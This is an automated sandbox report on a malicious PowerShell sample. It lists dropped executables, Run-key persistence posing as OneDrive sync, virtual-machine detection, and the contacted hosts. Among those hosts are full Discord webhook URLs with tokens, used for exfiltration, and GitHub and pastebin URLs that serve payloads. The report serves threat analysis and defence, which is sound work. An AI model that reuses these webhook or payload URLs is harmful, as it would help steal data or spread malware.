Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exeCode function: 6_2_00007FFB226551B0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,6_2_00007FFB226551B0
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts111
Windows Management Instrumentation		11
Registry Run Keys / Startup Folder		111
Process Injection		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		1
Web Service		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts3
PowerShell		1
DLL Side-Loading		11
Registry Run Keys / Startup Folder		1
Disable or Modify Tools		LSASS Memory131
Security Software Discovery		Remote Desktop ProtocolData from Removable Media11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		151
Virtualization/Sandbox Evasion		Security Account Manager151
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared Drive3
Ingress Tool Transfer		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
Process Injection		NTDS2
Process Discovery		Distributed Component Object ModelInput Capture4
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets1
Application Window Discovery		SSHKeylogging15
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Timestomp		Cached Domain Credentials1
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSync24
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1534234 Sample: cr_asm3.ps1 Startdate: 15/10/2024 Architecture: WINDOWS Score: 96 54 pastebin.com 2->54 56 raw.githubusercontent.com 2->56 58 discord.com 2->58 68 Suricata IDS alerts for network traffic 2->68 70 Malicious sample detected (through community Yara rule) 2->70 72 Sigma detected: Suspicious PowerShell Parameter Substring 2->72 76 2 other signatures 2->76 8 powershell.exe 15 31 2->8         started        13 forfiles.exe 1 2->13         started        15 forfiles.exe 1 2->15         started        17 svchost.exe 1 1 2->17         started        signatures3 74 Connects to a pastebin service (likely for C&C) 54->74 process4 dnsIp5 62 raw.githubusercontent.com 185.199.109.133, 443, 49701, 49703 FASTLYUS Netherlands 8->62 64 discord.com 162.159.138.232, 443, 49775, 49852 CLOUDFLARENETUS United States 8->64 46 C:\Users\user\...\Stand_Trainer_Updated.exe, PE32+ 8->46 dropped 48 C:\Users\user\AppData\Local\...\Backend.dll, PE32+ 8->48 dropped 50 C:\Users\user\AppData\...\dwdaoju2.cmdline, Unicode 8->50 dropped 52 C:\ProgramData\...\BeginSync.lnk, MS 8->52 dropped 82 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 8->82 84 Suspicious powershell command line found 8->84 86 Tries to open files direct via NTFS file id 8->86 88 2 other signatures 8->88 19 Stand_Trainer_Updated.exe 2 8->19         started        22 csc.exe 3 8->22         started        25 conhost.exe 8->25         started        27 attrib.exe 1 8->27         started        29 powershell.exe 7 13->29         started        31 conhost.exe 1 13->31         started        33 powershell.exe 15->33         started        35 conhost.exe 1 15->35         started        66 127.0.0.1 unknown unknown 17->66 file6 signatures7 process8 file9 78 Contains functionality to inject threads in other processes 19->78 44 C:\Users\user\AppData\Local\...\dwdaoju2.dll, PE32 22->44 dropped 37 cvtres.exe 1 22->37         started        80 Suspicious powershell command line found 29->80 39 powershell.exe 13 29->39         started        42 powershell.exe 33->42         started        signatures10 process11 dnsIp12 60 pastebin.com 104.20.3.235, 443, 49759, 49764 CLOUDFLARENETUS United States 39->60

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
cr_asm3.ps10%ReversingLabs

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\Backend.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\Stand_Trainer_Updated.exe0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://g.live.com/odclientsettings/ProdV21C:0%URL Reputationsafe
https://g.live.com/odclientsettings/Prod1C:0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
https://aka.ms/pscore680%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
discord.com
162.159.138.232
truetrue
    		unknown
    raw.githubusercontent.com
    		185.199.109.133
    		truetrue
      		unknown
      pastebin.com
      		104.20.3.235
      		truetrue
        		unknown

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/Backend.dllfalse
          		unknown
          https://discord.com/api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996true
            		unknown
            https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/FH5.exefalse
              		unknown
              http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
                		unknown
                https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txtfalse
                  		unknown
                  https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5true
                    		unknown
                    http://pastebin.com/raw/sA04Mwk2false
                      		unknown
                      https://pastebin.com/raw/sA04Mwk2false
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMpowershell.exe, 0000000C.00000002.1701038367.0000029200B8B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080EB8000.00000004.00000800.00020000.00000000.sdmptrue
                          		unknown
                          http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1538018702.0000026CA1531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1538018702.0000026CA1674000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          		unknown
                          https://discord.compowershell.exe, 00000001.00000002.1510210225.0000026C91D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.00000292014AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.000002408179C000.00000004.00000800.00020000.00000000.sdmptrue
                            		unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmpfalse
                              		unknown
                              https://go.micropowershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.000002920050A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.00000240807FA000.00000004.00000800.00020000.00000000.sdmptrue
                              • URL Reputation: safe
                              		unknown
                              https://discord.com/api/webhooks/129575196622756powershell.exe, 0000000C.00000002.1701038367.00000292014AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.000002408179C000.00000004.00000800.00020000.00000000.sdmptrue
                                		unknown
                                https://contoso.com/Licensepowershell.exe, 00000001.00000002.1538018702.0000026CA1674000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://contoso.com/Iconpowershell.exe, 00000001.00000002.1538018702.0000026CA1674000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                https://raw.githubusercontpowershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		unknown
                                  https://g.live.com/odclientsettings/ProdV21C:svchost.exe, 00000007.00000003.1367837796.000001F0D2BE0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.7.dr, edb.log.7.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://crl.ver)svchost.exe, 00000007.00000002.2554051222.000001F0D2E0F000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://discord.compowershell.exe, 00000001.00000002.1510210225.0000026C91D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.00000292014AB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.000002408179C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://crl.microsoftppowershell.exe, 00000011.00000002.1846302686.0000024098480000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          https://g.live.com/odclientsettings/Prod1C:edb.log.7.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://raw.githubusercontent.compowershell.exe, 00000001.00000002.1510210225.0000026C93175000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C92C00000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080E16000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		unknown
                                            https://discord.com/api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewvpowershell.exe, 00000011.00000002.1773538760.0000024080EB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080EB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080E82000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.000002408179C000.00000004.00000800.00020000.00000000.sdmptrue
                                              		unknown
                                              https://contoso.com/powershell.exe, 00000001.00000002.1538018702.0000026CA1674000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1538018702.0000026CA1531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1538018702.0000026CA1674000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://raw.githubusercontent.compowershell.exe, 00000001.00000002.1510210225.0000026C9313B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200B26000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200AF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080DE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080E16000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		unknown
                                                https://discord.com/api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTpowershell.exe, 00000001.00000002.1510210225.0000026C916E7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C91D65000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1510210225.0000026C91749000.00000004.00000800.00020000.00000000.sdmp, cr_asm3.ps1false
                                                  		unknown
                                                  https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/Photoshop_Set-Up.exepowershell.exe, 00000001.00000002.1510210225.0000026C916E7000.00000004.00000800.00020000.00000000.sdmp, cr_asm3.ps1false
                                                    		unknown
                                                    https://aka.ms/pscore68powershell.exe, 00000001.00000002.1510210225.0000026C914C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200049000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.000002920005D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.000002408034C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080339000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1510210225.0000026C914C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080373000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • URL Reputation: safe
                                                    		unknown
                                                    http://pastebin.compowershell.exe, 0000000C.00000002.1701038367.000002920050A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200A5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1701038367.0000029200A76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D68000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D4E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.00000240807FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://pastebin.compowershell.exe, 0000000C.00000002.1701038367.0000029200A66000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.1773538760.0000024080D58000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/OneDriveFileSync.dllpowershell.exe, 00000001.00000002.1510210225.0000026C916E7000.00000004.00000800.00020000.00000000.sdmp, cr_asm3.ps1false
                                                          		unknown

                                                          World Map of Contacted IPs

                                                          • No. of IPs < 25%
                                                          • 25% < No. of IPs < 50%
                                                          • 50% < No. of IPs < 75%
                                                          • 75% < No. of IPs

                                                          Public IPs

                                                          IPDomainCountryFlagASNASN NameMalicious
                                                          104.20.3.235
                                                          		pastebin.comUnited States
                                                          		13335CLOUDFLARENETUStrue
                                                          162.159.138.232
                                                          		discord.comUnited States
                                                          		13335CLOUDFLARENETUStrue
                                                          185.199.109.133
                                                          		raw.githubusercontent.comNetherlands
                                                          		54113FASTLYUStrue

                                                          Private

                                                          IP
                                                          127.0.0.1

                                                          General Information

                                                          Joe Sandbox version:41.0.0 Charoite
                                                          Analysis ID:1534234
                                                          Start date and time:2024-10-15 18:07:05 +02:00
                                                          Joe Sandbox product:CloudBasic
                                                          Overall analysis duration:0h 6m 51s
                                                          Hypervisor based Inspection enabled:false
                                                          Report type:full
                                                          Cookbook file name:default.jbs
                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                          Number of analysed new started processes analysed:22
                                                          Number of new started drivers analysed:0
                                                          Number of existing processes analysed:0
                                                          Number of existing drivers analysed:0
                                                          Number of injected processes analysed:0
                                                          Technologies:
                                                          • HCA enabled
                                                          • EGA enabled
                                                          • AMSI enabled
                                                          Analysis Mode:default
                                                          Analysis stop reason:Timeout
                                                          Sample name:cr_asm3.ps1
                                                          Detection:MAL
                                                          Classification:mal96.troj.expl.evad.winPS1@23/27@3/4
                                                          EGA Information:
                                                          • Successful, ratio: 100%
                                                          HCA Information:
                                                          • Successful, ratio: 90%
                                                          • Number of executed functions: 25
                                                          • Number of non-executed functions: 22
                                                          Cookbook Comments:
                                                          • Found application associated with file extension: .ps1

                                                          Warnings

                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                          • Excluded IPs from analysis (whitelisted): 184.28.90.27
                                                          • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, time.windows.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                          • Not all processes where analyzed, report is missing behavior information
                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                          • VT rate limit hit for: cr_asm3.ps1

                                                          Simulations

                                                          Behavior and APIs

                                                          TimeTypeDescription
                                                          12:08:07API Interceptor388x Sleep call for process: powershell.exe modified
                                                          12:08:12API Interceptor2x Sleep call for process: svchost.exe modified
                                                          18:08:13AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                                          18:08:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"

                                                          Joe Sandbox View / Context

                                                          IPs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          104.20.3.235gabe.ps1Get hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                                          • pastebin.com/raw/sA04Mwk2
                                                          sostener.vbsGet hashmaliciousNjratBrowse
                                                          • pastebin.com/raw/V9y5Q5vv
                                                          SX8OLQP63C.exeGet hashmaliciousVjW0rm, AsyncRAT, RATDispenserBrowse
                                                          • pastebin.com/raw/V9y5Q5vv
                                                          162.159.138.232cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                            VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                              xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                                                steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                  Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                                                    cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                                                      OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                        steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                                                          cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                            SecuriteInfo.com.Win64.MalwareX-gen.20317.810.exeGet hashmaliciousUnknownBrowse

                                                                              Domains

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              discord.comgabe.ps1Get hashmaliciousUnknownBrowse
                                                                              • 162.159.137.232
                                                                              aidjBV.ps1Get hashmaliciousUnknownBrowse
                                                                              • 162.159.135.232
                                                                              cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                              • 162.159.138.232
                                                                              cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                              • 162.159.136.232
                                                                              cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                              • 162.159.128.233
                                                                              vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.136.232
                                                                              vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.136.232
                                                                              VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                              • 162.159.138.232
                                                                              OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                              • 162.159.137.232
                                                                              5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                                              • 162.159.128.233
                                                                              raw.githubusercontent.comgabe.ps1Get hashmaliciousUnknownBrowse
                                                                              • 185.199.109.133
                                                                              aidjBV.ps1Get hashmaliciousUnknownBrowse
                                                                              • 185.199.110.133
                                                                              cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                              • 185.199.108.133
                                                                              cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                              • 185.199.110.133
                                                                              cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                              • 185.199.111.133
                                                                              na.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                                              • 185.199.109.133
                                                                              65567 DHL 647764656798860.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                              • 185.199.109.133
                                                                              Request for Order Confirmation.jsGet hashmaliciousUnknownBrowse
                                                                              • 185.199.110.133
                                                                              RrEf8Rui72.exeGet hashmaliciousUnknownBrowse
                                                                              • 185.199.109.133
                                                                              Untitled_15-10-04.xlsGet hashmaliciousRemcosBrowse
                                                                              • 185.199.108.133
                                                                              pastebin.comgabe.ps1Get hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                              • 104.20.4.235
                                                                              vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              vF20HtY4a4.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.20.4.235
                                                                              VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                              • 172.67.19.24
                                                                              OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                                                              • 104.20.3.235
                                                                              HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                                                              • 104.20.4.235

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              CLOUDFLARENETUSgabe.ps1Get hashmaliciousUnknownBrowse
                                                                              • 104.20.4.235
                                                                              aidjBV.ps1Get hashmaliciousUnknownBrowse
                                                                              • 162.159.135.232
                                                                              file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                              • 104.21.53.8
                                                                              cr_asm.ps1Get hashmaliciousUnknownBrowse
                                                                              • 162.159.138.232
                                                                              cr_asm_atCAD.ps1Get hashmaliciousUnknownBrowse
                                                                              • 162.159.136.232
                                                                              cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                                                              • 162.159.135.232
                                                                              cyCsE47YV3.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                              • 188.114.96.3
                                                                              RemotePCViewer.exeGet hashmaliciousUnknownBrowse
                                                                              • 172.67.37.123
